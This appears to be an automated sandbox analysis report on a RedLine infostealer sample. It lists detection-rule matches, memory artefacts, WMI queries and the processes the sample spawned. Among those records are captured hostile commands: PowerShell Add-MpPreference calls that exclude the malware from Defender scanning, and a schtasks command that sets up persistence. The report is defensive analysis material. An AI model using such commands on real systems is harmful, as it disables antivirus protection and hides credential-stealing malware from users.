                    Source: 10.2.LjGABleGAy.exe.424b620.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 8.2.RgIbrhxoEx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 8.2.RgIbrhxoEx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.LjGABleGAy.exe.4263440.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 10.2.LjGABleGAy.exe.4263440.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.RgIbrhxoEx.exe.3e22b60.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.RgIbrhxoEx.exe.3e22b60.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 10.2.LjGABleGAy.exe.424b620.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 10.2.LjGABleGAy.exe.424b620.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0.2.RgIbrhxoEx.exe.3e0ad40.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 00000008.00000002.2242729605.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 00000000.00000002.2133731245.0000000003E0A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: 0000000A.00000002.2218778326.000000000424B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: RgIbrhxoEx.exe PID: 5440, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: RgIbrhxoEx.exe PID: 3620, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: Process Memory Space: LjGABleGAy.exe PID: 1880, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                    Source: RgIbrhxoEx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: LjGABleGAy.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, A8wQQPxStWJpqrtu18.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, A8wQQPxStWJpqrtu18.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, A8wQQPxStWJpqrtu18.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, UjapGcaBaYOORK0HUJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.RgIbrhxoEx.exe.3fe01c8.2.raw.unpack, UjapGcaBaYOORK0HUJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, A8wQQPxStWJpqrtu18.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, A8wQQPxStWJpqrtu18.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, A8wQQPxStWJpqrtu18.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.RgIbrhxoEx.exe.40399e8.4.raw.unpack, UjapGcaBaYOORK0HUJ.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, A8wQQPxStWJpqrtu18.csSecurity API names: _0020.SetAccessControl
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, A8wQQPxStWJpqrtu18.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.RgIbrhxoEx.exe.5f40000.8.raw.unpack, A8wQQPxStWJpqrtu18.csSecurity API names: _0020.AddAccessRule
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/103@1/1
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile created: C:\Users\user\AppData\Roaming\LjGABleGAy.exeJump to behavior
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7400:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6976:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5504:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3408:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6728:120:WilError_03
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeMutant created: \Sessions\1\BaseNamedObjects\VROxcSBtqecTiNgSFAqIBtbkTc
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile created: C:\Users\user\AppData\Local\Temp\tmp3B03.tmpJump to behavior
                    Source: RgIbrhxoEx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: RgIbrhxoEx.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002F47000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2351084802.0000000006D61000.00000004.00000020.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000003030000.00000004.00000800.00020000.00000000.sdmp, LjGABleGAy.exe, 0000000E.00000002.2329592554.0000000002FBC000.00000004.00000800.00020000.00000000.sdmp, tmpD070.tmp.8.dr, tmpFAF9.tmp.8.dr, tmp53DB.tmp.14.dr, tmpD03D.tmp.8.dr, tmpD04E.tmp.8.dr, tmp2AD0.tmp.14.dr, tmp1CF9.tmp.14.dr, tmp30F2.tmp.8.dr, tmp30E1.tmp.8.dr, tmp1CC9.tmp.14.dr, tmp539B.tmp.14.dr, tmpD060.tmp.8.dr, tmp1D28.tmp.14.dr, tmp5F51.tmp.14.dr, tmpD03E.tmp.8.dr, tmp5F72.tmp.14.dr, tmp5F40.tmp.14.dr, tmpFAE9.tmp.8.dr, tmp2B00.tmp.14.dr, tmp53CB.tmp.14.dr, tmp5F61.tmp.14.dr, tmp30D1.tmp.8.dr, tmpD05F.tmp.8.dr, tmp30C0.tmp.8.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: RgIbrhxoEx.exeReversingLabs: Detection: 83%
                    Source: RgIbrhxoEx.exeVirustotal: Detection: 43%
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeFile read: C:\Users\user\Desktop\RgIbrhxoEx.exe:Zone.IdentifierJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\RgIbrhxoEx.exe "C:\Users\user\Desktop\RgIbrhxoEx.exe"
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RgIbrhxoEx.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LjGABleGAy.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp3B03.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess created: C:\Users\user\Desktop\RgIbrhxoEx.exe "C:\Users\user\Desktop\RgIbrhxoEx.exe"
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\LjGABleGAy.exe C:\Users\user\AppData\Roaming\LjGABleGAy.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp5E88.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess created: C:\Users\user\AppData\Roaming\LjGABleGAy.exe "C:\Users\user\AppData\Roaming\LjGABleGAy.exe"
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RgIbrhxoEx.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\LjGABleGAy.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp3B03.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeProcess created: C:\Users\user\Desktop\RgIbrhxoEx.exe "C:\Users\user\Desktop\RgIbrhxoEx.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\LjGABleGAy" /XML "C:\Users\user\AppData\Local\Temp\tmp5E88.tmp"
                    Source: C:\Users\user\AppData\Roaming\LjGABleGAy.exeProcess created: C:\Users\user\AppData\Roaming\LjGABleGAy.exe "C:\Users\user\AppData\Roaming\LjGABleGAy.exe"
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\RgIbrhxoEx.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
